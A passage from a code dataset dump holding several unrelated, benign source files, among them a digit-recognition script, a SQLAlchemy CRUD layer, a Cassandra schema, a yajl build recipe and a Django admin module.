sys.exit(1)\n\ndef validate(args):\n # Check the source and destination validity.\n if not os.path.isdir(args.source) and not os.path.isdir(args.destination):\n print(sys.argv[0] + \": error: `\" + args.source + \"` and `\" + args.destination + \"` are not directories.\")\n sys.exit(2)\n elif not os.path.isdir(args.destination):\n print(sys.argv[0] + \": error: `\" + args.destination + \"` is not a directory\")\n sys.exit(2)\n elif not os.path.isdir(args.source):\n print(sys.argv[0] + \": error: `\" + args.source + \"` is not a directory\")\n sys.exit(2)\n\n # Remove ending slash if ther's some.\n if args.source[-1] == '/': args.source = args.source[:-1]\n if args.destination[-1] == '/': args.destination = args.destination[:-1]\n\n # Prevent the destination being within the source.\n if args.source in args.destination and len(args.destination) >= len(args.source): \n print(sys.argv[0] + \": error: the destination can't be within the source.\")\n sys.exit(2)\n\n # Check if the source isn't empty.\n if not os.listdir(args.source):\n print(sys.argv[0] + \": error: `\" + args.source + \"` is empty.\")\n sys.exit(2)\n\n # Interactive for user validation.\n if not args.force:\n print(\"Use \" + args.source + \"/ as source and \" + args.destination + \"/ as destination for sorting ? \")\n if not user_yes_no_query(\"Are you sure ? \"):\n print(\"Bye then !\")\n sys.exit(2)","sub_path":"sorthoards/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"564422918","text":"import argparse\nimport lostfilm\n\ndef initdb():\n for s in dir(lostfilm):\n item = getattr(lostfilm, s)\n if hasattr(item, 'table_exists') \\\n and hasattr(item, 'create_table'):\n if not item.table_exists():\n print('Creating table for %s' % item)\n item.create_table()\n\ndef syncdb():\n lostfilm.serial.populate()\n\ndef print_serial_info(serial):\n print('id : %d' % serial.serial_id)\n print('en_US: %s' % serial.en_name)\n print('ru_RU: %s' % serial.ru_name)\n print\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Shitpile manipulator')\n parser.add_argument(\"-i\", \"--initdb\", action=\"store_true\",\n help=\"Create necessary tables\")\n parser.add_argument(\"-s\", \"--syncdb\", action=\"store_true\",\n help=\"Load data from website\")\n parser.add_argument(\"--find-serial\", action=\"store\",\n help=\"Find serial\")\n args = parser.parse_args()\n if args.initdb:\n initdb()\n if args.syncdb:\n syncdb()\n if args.find_serial != '':\n for i in lostfilm.serial.find_by_name(args.find_serial):\n print_serial_info(i)\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"166564061","text":"# -*- coding:utf-8 -*-\n\"\"\"使用矩描述图像的区域特征\"\"\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport cv2\nfrom pylab import np, plt\n# Import datasets, classifiers and performance metrics\nfrom sklearn import datasets, neighbors, metrics\n\n\ndef show_image(image, **kwargs):\n fig = plt.figure()\n axe = fig.add_subplot(111)\n axe.imshow(image, **kwargs)\n plt.xticks(())\n plt.yticks(())\n fig.show()\n\n\ndef plot_gallery(images, titles, h, w, n_row=3, n_col=4):\n \"\"\"Helper function to plot a gallery of portraits\"\"\"\n plt.figure(figsize=(1.8 * n_col, 2.4 * n_row))\n plt.subplots_adjust(bottom=0, left=.01, right=.99, top=.90, hspace=.35)\n for i in range(n_row * n_col):\n plt.subplot(n_row, n_col, i + 1)\n plt.imshow(images[i].reshape((h, w)), cmap=plt.cm.gray)\n plt.title(titles[i], size=12)\n plt.xticks(())\n plt.yticks(())\n\n\ndef make_module():\n # The digits dataset\n # http://archive.ics.uci.edu/ml/machine-learning-databases/pendigits/pendigits.names\n # \tIn our study, we use only ($x, y$) coordinate information. The stylus\n # pressure level values are ignored. First we apply normalization to\n # make our representation invariant to translations and scale\n # distortions. The raw data that we capture from the tablet consist of\n # integer values between 0 and 500 (tablet input box resolution). The\n # new coordinates are such that the coordinate which has the maximum\n # range varies between 0 and 100. Usually $x$ stays in this range, since\n # most characters are taller than they are wide.\n\n digits = datasets.load_digits()\n # To apply a classifier on this data, we need to flatten the image, to\n # turn the data in a (samples, feature) matrix:\n n_samples = len(digits.images)\n half = int(n_samples / 2)\n print('数字训练集大小为: ', digits.images.shape)\n data = digits.images.reshape((n_samples, -1))\n # Create a classifier: a support vector classifier\n classifier = neighbors.KNeighborsClassifier()\n\n # We learn the digits on the first half of the digits\n classifier.fit(data, digits.target)\n\n # Now predict the value of the digit on the second half:\n # expected = digits.target[half:]\n # predicted = classifier.predict(data[half:])\n #\n # print(\"Classification report for classifier %s:\\n%s\\n\"\n # % (classifier, metrics.classification_report(expected, predicted)))\n # print(digits.images[0])\n # show_image(digits.images[0])\n # print(cv2.normalize(digits.images[0], digits.images[0], 0, 1, cv2.NORM_MINMAX))\n return classifier\n\n\ndef recognize_digital_number(original_image):\n # 使用双边滤波保持边界清晰的情况下有效的去除噪音\n # cv2.bilateralFilter(src, d, sigmaColor, sigmaSpace)\n # d – Diameter of each pixel neighborhood that is used during filtering.\n # If it is non-positive, it is computed from sigmaSpace\n # 9 邻域直径,两个 75 分别是空间高斯函数标准差,灰度值相似性高斯函数标准差\n # original_image = cv2.bilateralFilter(original_image, 9, 75, 75)\n original_image = cv2.blur(original_image, 5, 5)\n # 转换为灰度图像\n gray = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)\n # gray = cv2.equalizeHist(gray)\n # 使用大津阈值法将图像二值化\n # https://en.wikipedia.org/wiki/Otsu%27s_method\n ret2, th = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n show_image(th, cmap=plt.cm.gray)\n\n # 计算 Hu 矩\n # https://en.wikipedia.org/wiki/Image_moment\n # http://docs.opencv.org/2.4/modules/imgproc/doc/structural_analysis_and_shape_descriptors.html?highlight=moment#cv2.HuMoments\n m = cv2.moments(th)\n hu = cv2.HuMoments(m)\n print('-' * 30)\n for i in range(len(hu)):\n print('hu[%d]: %f' % (i, hu[i]))\n print('-' * 30)\n # http://docs.opencv.org/2.4/modules/imgproc/doc/structural_analysis_and_shape_descriptors.html?highlight=findcontours#suzuki85\n # http://wenku.baidu.com/link?url=OeYOUricBubk5u7AD-pTw1dV7cDtb5RwZDKM_H86NqF5U4CnOxsm9_4PcRN9YPpiJ4eNFi_XCo1pW_1WKeMsHJMtvxq-qCBvTY-zGP0fVOy\n # 第一个是输入图像,第二个是轮廓检索模式,第三个是轮廓近似方法。\n # 返回值有三个,第一个是图像,第二个是轮廓,第三个是(轮廓的)层析结构。\n # 轮廓(第二个返回值)是一个 Python 列表,其中存储这图像中的所有轮廓。每一个轮廓都是一个 Numpy 数组,包含对象边界点(x,y)的坐标。\n image, contours, hierarchy = cv2.findContours(th, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n n_samples = len(contours)\n print('检测到了 %d 个轮廓' % n_samples)\n image_copy = original_image.copy()\n nums = []\n for i, c in enumerate(contours):\n x, y, w, h = cv2.boundingRect(c)\n print('第 %2d 个轮廓的左上顶点为 (%3d, %3d), 宽高为 (%3d, %3d)' % (i, x, y, w, h))\n # 灰度图中截取图像\n num = gray[y:y + h, x: x + w]\n num = cv2.bitwise_not(num)\n # 调整大小\n num = cv2.resize(num, (8, 8), interpolation=cv2.INTER_AREA)\n # 归一化提高了识别正确率\n # 归一化:原始图像,结果图像,映射到结果图像中的最小值,最大值,归一化类型\n num = cv2.normalize(num, num, 0, 16, cv2.NORM_MINMAX)\n nums.append(num)\n image_copy = cv2.rectangle(image_copy, (x, y), (x + w, y + h), (0, 255, 0), 2)\n cv2.putText(image_copy, str(i), (x + w, y + int(h / 2)), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0), 2)\n # retval = cv2.boxPoints(cv2.minAreaRect(c))\n # print(retval)\n # x, y, w, h = retval\n # image = cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\n # 第一个参数是原始图像,第二个参数是轮廓,一个 Python 列表。第三个参数是轮廓的索引(在绘制独立轮廓是很有用,当设置为 -1 时绘制所有轮廓)。接下来的参数是轮廓的颜色和厚度等\n # image_with_contour = cv2.drawContours(original_image, contours, -1, (0, 255, 0), 2)\n nums = np.array(nums)\n return image_copy, nums.reshape((n_samples, -1))\n\n\n# cap = cv2.VideoCapture()\n# if not cap.isOpened():\n# print('camera is not opened!')\n# cap.open(0)\n#\n# while (cap.isOpened()):\n# ret, frame = cap.read()\n# recognize_digital_number(frame)\n# if cv2.waitKey(1) & 0xFF == ord('q'):\n# break\n# cap.release()\n# cv2.destroyAllWindows()\n\nclassifier = make_module()\n\nimg = cv2.imread('handwriting_digital_number.jpg')\n# img = cv2.imread('digital_number.png')\nimg, nums = recognize_digital_number(img)\nshow_image(img)\n# img = cv2.imread('digital_number.png')\n#\n# img, nums = recognize_digital_number(img)\n# show_image(img)\n# plot_gallery(nums, [str(i) for i in range(len(nums))], 8, 8, 2, 5)\n\n# cv2.waitKey(0)\n# while cv2.waitKey(1) & 0xFF != ord('q'):\n# continue\n\n# cv2.destroyAllWindows()\npredicted = classifier.predict(nums)\nplot_gallery(nums, ['predicted: %d' % p for p in predicted], 8, 8, 2, 5)\nplt.show()\n","sub_path":"image-processing/moment.py","file_name":"moment.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"594586330","text":"# ~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Import\r\nfrom packages import iSmart\r\n\r\n# Functions\r\ndef user(u_mode = 0):\r\n db_c_user = list(())\r\n with open(\"database/user.csv\",\"r\") as db_f_user:\r\n for db_c_user_category in db_f_user.readlines():\r\n if db_c_user_category.split(\",\")[0] == \"id\":\r\n db_c_user_index = int(db_c_user_category.split(\",\").index(\"name\"))\r\n else:\r\n if u_mode == 0:\r\n db_c_user.append(db_c_user_category.split(\",\")[db_c_user_index])\r\n elif u_mode == 1:\r\n db_c_user.append(db_c_user_category.split(\",\")[db_c_user_index].upper())\r\n db_f_user.close()\r\n return db_c_user\r\n\r\ndef new_id():\r\n with open(\"database/user.csv\",\"r\") as db_f_user:\r\n for db_c_user_category in db_f_user.readlines():\r\n ni_last_id = db_c_user_category.split(\",\")[0]\r\n ni_new_id = int(ni_last_id) + 1\r\n ni_new_text = \"\"\r\n ni_new_len = len(str(ni_new_id))\r\n if ni_new_len <= 5:\r\n ni_req_zero = 5 - ni_new_len\r\n for ni_each_zero in range(ni_req_zero):\r\n ni_new_text += \"0\"\r\n del ni_each_zero\r\n ni_new_text += str(ni_new_id)\r\n db_f_user.close()\r\n return ni_new_text\r\n\r\ndef id(i_user):\r\n with open(\"database/user.csv\",\"r\") as db_f_user:\r\n for db_c_user_category in db_f_user.readlines():\r\n if db_c_user_category.split(\",\")[1].upper() == i_user.upper():\r\n i_id = db_c_user_category.split(\",\")[0]\r\n break\r\n db_f_user.close()\r\n return i_id\r\n\r\ndef sport(s_id, s_mode = 0):\r\n s_sport = list(())\r\n with open(\"database/appointment.csv\",\"r\") as db_f_appointment:\r\n for db_c_appointment_category in db_f_appointment.readlines():\r\n if db_c_appointment_category.split(\",\")[0] == s_id:\r\n if s_mode == 0:\r\n s_sport.append(db_c_appointment_category.split(\",\")[1])\r\n elif s_mode == 1:\r\n s_sport.append(db_c_appointment_category.split(\",\")[1].upper())\r\n db_f_appointment.close()\r\n return s_sport\r\n\r\ndef bio(b_id):\r\n with open(\"database/user.csv\",\"r\") as db_f_user:\r\n for db_c_user_category in db_f_user.readlines():\r\n if db_c_user_category.split(\",\")[0] == b_id:\r\n b_name = db_c_user_category.split(\",\")[1]\r\n b_age = db_c_user_category.split(\",\")[2]\r\n b_gender = db_c_user_category.split(\",\")[3]\r\n break\r\n db_f_user.close()\r\n b_content = \"ID\\t: \"+ b_id +\"\\nName\\t: \"+ b_name +\"\\nAge\\t: \"+ b_age +\"\\nGender\\t: \"+ b_gender\r\n return b_content\r\n\r\ndef workout(w_id, w_sport):\r\n with open(\"database/appointment.csv\",\"r\") as db_f_appointment:\r\n for db_c_appointment_category in db_f_appointment.readlines():\r\n if db_c_appointment_category.split(\",\")[0] == w_id and db_c_appointment_category.split(\",\")[1] == w_sport:\r\n w_goal = db_c_appointment_category.split(\",\")[2]\r\n w_time = db_c_appointment_category.split(\",\")[3]\r\n w_record = db_c_appointment_category.split(\",\")[4]\r\n break\r\n db_f_appointment.close()\r\n w_time_read = iSmart.read(\"time\", w_time)\r\n w_record_read = iSmart.read(\"record\", w_record)\r\n w_content = \"Sport\\t: \"+ w_sport +\"\\nGoal\\t: \"+ w_goal +\" kcal\\nTime recommend\\t: \"+ w_time_read +\"\\nRecords\\t: \"+ w_record_read\r\n return w_content","sub_path":"packages/getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"39843322","text":"from dataclasses import dataclass\nfrom typing import Any, Dict, List, Optional, Sequence, Set, Tuple, Union, cast\n\nfrom sqlalchemy import Column, Table, func, insert, select\nfrom sqlalchemy.sql import Select, and_, or_\nfrom sqlalchemy.sql.dml import Delete, Insert, Update\n\nfrom ..db.container import Database\nfrom ..pagination import (\n Pagination,\n PaginationVisitor,\n Search,\n SearchVisitor,\n fields_flip_sign,\n)\nfrom ..pagination.cursor import cursor_to_python\nfrom ..types import Connection, Record, Records\n\nQueryType = Union[Delete, Select, Update]\nSelectUpdate = Union[Select, Update]\n\n\nclass CrudDB(Database):\n \"\"\"A :class:`.Database` with additional methods for CRUD operations\"\"\"\n\n async def db_select(\n self,\n table: Table,\n filters: Dict,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> Records:\n \"\"\"Select rows from a given table\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n sql_query = self.get_query(\n table, table.select(), consumer=consumer, params=filters\n )\n async with self.ensure_connection(conn) as conn:\n return await conn.execute(sql_query)\n\n async def db_delete(\n self,\n table: Table,\n filters: Dict,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> Records:\n \"\"\"Delete rows from a given table\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n sql_query = self.get_query(\n table,\n table.delete().returning(*table.columns),\n consumer=consumer,\n params=filters,\n )\n async with self.ensure_connection(conn) as conn:\n return await conn.execute(sql_query)\n\n async def db_count(\n self,\n table: Table,\n filters: Optional[Dict] = None,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> int:\n \"\"\"Count rows in a table\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n sql_query = self.get_query(\n table, table.select(), consumer=consumer, params=filters\n )\n return await self.db_count_query(sql_query, conn=conn)\n\n async def db_count_query(\n self,\n sql_query: Select,\n *,\n conn: Optional[Connection] = None,\n ) -> int:\n count_query = select(func.count()).select_from(sql_query.alias(\"inner\"))\n async with self.ensure_connection(conn) as conn:\n result = await conn.execute(count_query)\n return result.scalar()\n\n async def db_insert(\n self,\n table: Table,\n data: Union[List[Dict], Dict],\n *,\n conn: Optional[Connection] = None,\n ) -> Records:\n \"\"\"Perform an insert into a table\n\n :param table: sqlalchemy Table\n :param data: key-value pairs for columns values\n :param conn: optional db connection\n \"\"\"\n async with self.ensure_connection(conn) as conn:\n sql_query = self.insert_query(table, data)\n return await conn.execute(sql_query)\n\n async def db_update(\n self,\n table: Table,\n filters: Dict,\n data: Dict,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> Records:\n \"\"\"Perform an update of rows\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows to update\n :param data: key-value pairs for updating columns values of selected rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n update = (\n cast(\n Update,\n self.get_query(\n table, table.update(), consumer=consumer, params=filters\n ),\n )\n .values(**data)\n .returning(*table.columns)\n )\n async with self.ensure_connection(conn) as conn:\n return await conn.execute(update)\n\n async def db_upsert(\n self,\n table: Table,\n filters: Dict,\n data: Optional[Dict] = None,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> Record:\n \"\"\"Perform an upsert for a single record\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows to update\n :param data: key-value pairs for updating columns values of selected rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n if data:\n result = await self.db_update(\n table, filters, data, conn=conn, consumer=consumer\n )\n else:\n result = await self.db_select(table, filters, conn=conn, consumer=consumer)\n record = result.one_or_none()\n if record is None:\n insert_data = data.copy() if data else {}\n insert_data.update(filters)\n result = await self.db_insert(table, insert_data, conn=conn)\n record = result.one()\n return record\n\n async def db_paginate(\n self,\n table: Table,\n sql_query: Select,\n pagination: Pagination,\n *,\n conn: Optional[Connection] = None,\n ) -> Tuple[Records, Optional[int]]:\n pagination_visitor = DbPaginationVisitor(\n db=self, table=table, sql_query=sql_query\n )\n pagination.apply(pagination_visitor)\n async with self.ensure_connection(conn) as conn:\n return await pagination_visitor.execute(conn)\n\n # Query methods\n\n def insert_query(self, table: Table, records: Union[List[Dict], Dict]) -> Insert:\n if isinstance(records, dict):\n records = [records]\n else:\n cols: Set[str] = set()\n for record in records:\n cols.update(record)\n new_records = []\n for record in records:\n if len(record) < len(cols):\n record = record.copy()\n missing = cols.difference(record)\n for col in missing:\n record[col] = None\n new_records.append(record)\n records = new_records\n return insert(table).values(records).returning(*table.columns)\n\n # backward compatibility\n get_insert = insert_query\n\n def get_query(\n self,\n table: Table,\n sql_query: QueryType,\n *,\n params: Optional[Dict] = None,\n consumer: Any = None,\n ) -> QueryType:\n \"\"\"Build an SqlAlchemy query\n\n :param table: sqlalchemy Table\n :param sql_query: sqlalchemy query type\n :param params: key-value pairs for the query\n :param consumer: optional consumer for manipulating parameters\n \"\"\"\n filters: List = []\n columns = table.c\n params = params or {}\n\n for key, value in params.items():\n bits = key.split(\":\")\n field = bits[0]\n op = bits[1] if len(bits) == 2 else \"eq\"\n filter_field = getattr(consumer, f\"filter_{field}\", None)\n if filter_field:\n result = filter_field(op, value)\n else:\n field = getattr(columns, field)\n result = self.default_filter_field(field, op, value)\n if result is not None:\n if not isinstance(result, (list, tuple)):\n result = (result,)\n filters.extend(result)\n if filters:\n whereclause = and_(*filters) if len(filters) > 1 else filters[0]\n sql_query = cast(Select, sql_query).where(whereclause)\n return sql_query\n\n def search_query(\n self, table: Table, sql_query: SelectUpdate, search: Search\n ) -> SelectUpdate:\n \"\"\"Build an SqlAlchemy query for a search\n\n :param table: sqlalchemy Table\n :param sql_query: sqlalchemy query type\n :param search: the search dataclass\n \"\"\"\n search_visitor = DbSearchVisitor(\n db=self, table=table, sql_query=cast(SelectUpdate, sql_query)\n )\n search.apply(search_visitor)\n return search_visitor.sql_query\n\n def order_by_query(\n self,\n table: Table,\n sql_query: Select,\n order_by: Optional[Union[str, Sequence[str]]],\n ) -> Select:\n \"\"\"Apply ordering to a sql_query\"\"\"\n if isinstance(order_by, str):\n order_by = (order_by,)\n for name in order_by or ():\n if name.startswith(\"-\"):\n order_by_column = getattr(table.c, name[1:], None)\n if order_by_column is not None:\n order_by_column = order_by_column.desc()\n else:\n order_by_column = getattr(table.c, name, None)\n if order_by_column is not None:\n sql_query = sql_query.order_by(order_by_column)\n return sql_query\n\n # backward compatibility\n order_by = order_by_query\n\n def default_filter_field(self, field: Column, op: str, value: Any):\n \"\"\"\n Applies a filter on a field.\n\n Notes on 'ne' op:\n\n Example data: [None, 'john', 'roger']\n ne:john would return only roger (i.e. nulls excluded)\n ne: would return john and roger\n\n Notes on 'search' op:\n\n For some reason, SQLAlchemy uses to_tsquery rather than\n plainto_tsquery for the match operator\n\n to_tsquery uses operators (&, |, ! etc.) while\n plainto_tsquery tokenises the input string and uses AND between\n tokens, hence plainto_tsquery is what we want here\n\n For other database back ends, the behaviour of the match\n operator is completely different - see:\n http://docs.sqlalchemy.org/en/rel_1_0/core/sqlelement.html\n\n :param field: field name\n :param op: 'eq', 'ne', 'gt', 'lt', 'ge', 'le' or 'search'\n :param value: comparison value, string or list/tuple\n :return:\n \"\"\"\n multiple = isinstance(value, (list, tuple))\n\n if multiple and op in (\"eq\", \"ne\"):\n if op == \"eq\":\n return field.in_(value)\n elif op == \"ne\":\n return ~field.in_(value)\n else:\n if multiple:\n assert len(value) > 0\n value = value[0]\n\n if op == \"eq\":\n return field == value\n elif op == \"ne\":\n return field != value\n elif op == \"gt\":\n return field > value\n elif op == \"ge\":\n return field >= value\n elif op == \"lt\":\n return field < value\n elif op == \"le\":\n return field <= value\n\n\n@dataclass\nclass DbSearchVisitor(SearchVisitor):\n db: CrudDB\n table: Table\n sql_query: SelectUpdate\n\n def apply_search(self, search: str, search_fields: Sequence[str]) -> None:\n if search:\n columns = [getattr(self.table.c, col) for col in search_fields]\n self.sql_query = self.sql_query.where(\n or_(*(col.ilike(f\"%{search}%\") for col in columns))\n )\n\n\n@dataclass\nclass DbPaginationVisitor(PaginationVisitor):\n db: CrudDB\n table: Table\n sql_query: Select\n initial_sql: Optional[QueryType] = None\n\n def apply_offset_pagination(\n self,\n limit: int,\n offset: int,\n order_by: Optional[Union[str, Sequence[str]]],\n ) -> None:\n self.initial_sql = self.sql_query\n sql_query = self.db.order_by_query(self.table, self.sql_query, order_by)\n if offset:\n sql_query = sql_query.offset(offset)\n if limit:\n sql_query = sql_query.limit(limit)\n self.sql_query = sql_query\n\n def apply_cursor_pagination(\n self,\n cursor: Sequence[Tuple[str, str]],\n limit: int,\n order_by: Sequence[str],\n previous: bool = False,\n ) -> None:\n sql_query = self.sql_query\n for key, value in cursor:\n sql_query = sql_query.where(self.filter(key, value, previous))\n extra = 1\n if previous:\n extra += 1\n order_by = fields_flip_sign(order_by)\n self.sql_query = self.db.order_by_query(self.table, sql_query, order_by).limit(\n limit + extra\n )\n\n async def execute(self, conn: Connection) -> Tuple[Records, Optional[int]]:\n total = None\n if self.initial_sql is not None:\n total = await self.db.db_count_query(self.initial_sql, conn=conn)\n values = await conn.execute(self.sql_query)\n return values, total\n\n def filter(self, field: str, value: str, previous: bool) -> Column:\n if field.startswith(\"-\"):\n field = field[1:]\n op = \"ge\" if previous else \"le\"\n else:\n op = \"le\" if previous else \"ge\"\n column = getattr(self.table.c, field)\n py_value = cursor_to_python(column.type.python_type, value)\n return self.db.default_filter_field(column, op, py_value)\n","sub_path":"openapi/db/dbmodel.py","file_name":"dbmodel.py","file_ext":"py","file_size_in_byte":13697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"195889409","text":"'''\nCS 1026 Assignment 2: Volume Calculator\nBy Adam LaBrash\nStudent #251034920\nProgram presents volume calculated from volume.py (cubes, pyramids, or ellipsoids) based on user input\nFirst the input is verified and then once the volume is calculated, the values are presented in a string\n'''\n\nfrom volumes import *\n\n#Initialize list of lists, each list will contain the volumes of a shape\nshape_List = [[], [], []]\n\n\ndef verify_input():\n '''\n Function verifies input from user and calls appropriate function to calculate volume\n Function will continue prompting until user quits\n '''\n \n global shape_List\n\n while True:\n order = input('\\nEnter a shape ').lower()\n if order in ('quit', 'q'):\n break\n\n elif order in ('cube', 'c'):\n shape_List[0].append(cube())\n\n elif order in ('pyramid', 'p'):\n shape_List[1].append(pyramid())\n\n elif order in ('ellipsoid', 'e'):\n shape_List[2].append(ellipsoid())\n\n\ndef organize_volumes():\n '''\n Function checks if calculations took place (if volume lists empty)\n Joins and sorts volumes together into a presentable format\n '''\n\n noCalculations = True\n\n for volumeList in shape_List:\n if shape_List[shape_List.index(volumeList)]:\n noCalculations = False\n shape_List[shape_List.index(volumeList)].sort(key=float)\n shape_List[shape_List.index(volumeList)] = \", \".join(shape_List[shape_List.index(volumeList)])\n\n else:\n shape_List[shape_List.index(volumeList)] = 'No calculations required.'\n\n if noCalculations:\n print('You have reached the end of the session\\nYou did not perform any volume calculations')\n\n else:\n print('\\nYou have reached the end of your session \\nThe volumes calculated for each object are (from least to greatest):')\n print(f'\\nCube: {shape_List[0]}\\nPyramid: {shape_List[1]}\\nEllipsoid: {shape_List[2]}')\n\n\ndef main():\n verify_input()\n organize_volumes()\n\nmain()","sub_path":"Assignments/Assignment2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"507951121","text":"import info\n\nfrom Package.CMakePackageBase import *\n\n\nclass subinfo(info.infoclass):\n def setTargets(self):\n self.description = 'Yet Another JSON Library'\n\n self.svnTargets['master'] = 'https://github.com/lloyd/yajl'\n\n ver = '1.0.12'\n\n self.targets[ver] = 'http://github.com/lloyd/yajl/tarball/%s' % ver\n self.archiveNames[ver] = 'lloyd-yajl-%s.tar.gz' % ver\n self.targetDigests[ver] = 'f0177e3a946d6ae9a0a963695b2c143a03219bf2'\n self.patchToApply[ver] = ('lloyd-yajl-17b1790-20110725.diff', 1)\n self.targetInstSrc[ver] = 'lloyd-yajl-17b1790'\n\n self.defaultTarget = ver\n\n def setDependencies(self):\n self.runtimeDependencies[\"virtual/base\"] = None\n\n\nclass Package(CMakePackageBase):\n def __init__(self):\n CMakePackageBase.__init__(self)\n","sub_path":"libs/yajl/yajl.py","file_name":"yajl.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"97561843","text":"\n_METRICS_TABLE = 'metrics'\n_JOURNAL_TABLE = 'rollups_journal'\n_ROLLUP_TABLE_PREFIX = 'rollups'\n\n_METRICS_TABLE_STMT = \"\"\"CREATE TABLE IF NOT EXISTS {keyspace}.{metrics_table} (\n\tmetric_id ascii,\n\tts_rotation timestamp,\n\tshard int,\n\n\tmetric_key ascii,\n\tuuid timeuuid,\n\n\tvalue int,\n\n\tPRIMARY KEY ((metric_id, ts_rotation, shard), metric_key, uuid)\n) WITH COMPACT STORAGE ;\"\"\"\n\n\n_ROLLUP_TABLE_STMT = \"\"\"CREATE TABLE IF NOT EXISTS {keyspace}.{rollup_table} (\n\tmetric_id ascii,\n\tts timestamp,\n\tshard int,\n\n\tmetric_key ascii,\n\n\tvalue bigint,\n\n\tPRIMARY KEY ((metric_id, ts, shard), metric_key)\n)\nWITH COMPACT STORAGE ;\"\"\"\n\n_JOURNAL_TABLE_STMT = \"\"\"CREATE TABLE IF NOT EXISTS {keyspace}.{journal_table} (\n\tmetric_id ascii,\n\trollup int,\n\n\tshard_from int,\n\tshard_to int,\n\n\tts timestamp,\n\n\tstate int,\n\n\tPRIMARY KEY ((metric_id, rollup, shard_from, shard_to), ts)\n)\nWITH CLUSTERING ORDER BY (ts DESC) ;\"\"\"\n\n\nclass Schema(object):\n\n\tdef __init__(self, session, keyspace, rollups):\n\t\tself._session = session\n\t\tself._keyspace = keyspace\n\n\t\tself.metrics_table = _METRICS_TABLE\n\t\tself.journal_table = _JOURNAL_TABLE\n\t\tself.rollup_tables = {rollup: '%s_%s' % (_ROLLUP_TABLE_PREFIX, rollup) for rollup, ttl in rollups}\n\n\tdef create_tables(self):\n\t\tself._session.execute(_METRICS_TABLE_STMT.format(keyspace=self._keyspace, metrics_table=self.metrics_table))\n\t\tself._session.execute(_JOURNAL_TABLE_STMT.format(keyspace=self._keyspace, journal_table=self.journal_table))\n\n\t\tfor rollup, table_name in self.rollup_tables.iteritems():\n\t\t\tself._session.execute(_ROLLUP_TABLE_STMT.format(keyspace=self._keyspace, rollup_table=table_name))\n\n","sub_path":"sheepy/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"279206150","text":"import json\n\nfrom django.contrib import admin\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models import Count\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.models import Group\nfrom django.db.models.functions import TruncDay\n\nfrom .models import *\n\nadmin.site.register(Customer)\n\n@admin.register(Magazine)\nclass MagazineAdmin(admin.ModelAdmin):\n list_display = (\"name\", \"dateCreated\", \"viewcount\")\n ordering = (\"-dateCreated\",)\n\n def changelist_view(self, request, extra_context=None):\n # each column data of name, viewcount, and magazineGroup in Magazine objects\n magazine_data = (\n Magazine.objects.values('name', 'viewcount', 'magazineGroup')\n )\n\n # each column data of username and groups in User objects\n user_groups_data = (\n list(User.objects.values_list('username','groups'))\n )\n\n # each column data of id and name in Group objects\n groups_data = (\n list(Group.objects.values('id', 'name'))\n )\n\n # Serialize and attach the chart data to the template context\n as_json_magazine = json.dumps(list(magazine_data), cls=DjangoJSONEncoder)\n as_json_user = json.dumps(list(user_groups_data), cls=DjangoJSONEncoder)\n as_json_groups = json.dumps(list(groups_data), cls=DjangoJSONEncoder)\n extra_context = extra_context or {\"magazine_data\": as_json_magazine, \"user_groups_data\": as_json_user, \"groups_data\": as_json_groups}\n\n # Call the superclass changelist_view to render the page\n return super().changelist_view(request, extra_context=extra_context)\n\nclass CustomerAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"name\", \"email\", \"dataCreated\")\n ordering = (\"-dateCreated\",)\n\n def changelist_view(self, request, extra_context=None):\n # Aggregate new subscribers per day\n chart_data = (\n Customer.objects.annotate(date=TruncDay(\"dataCreated\"))\n .values(\"date\")\n 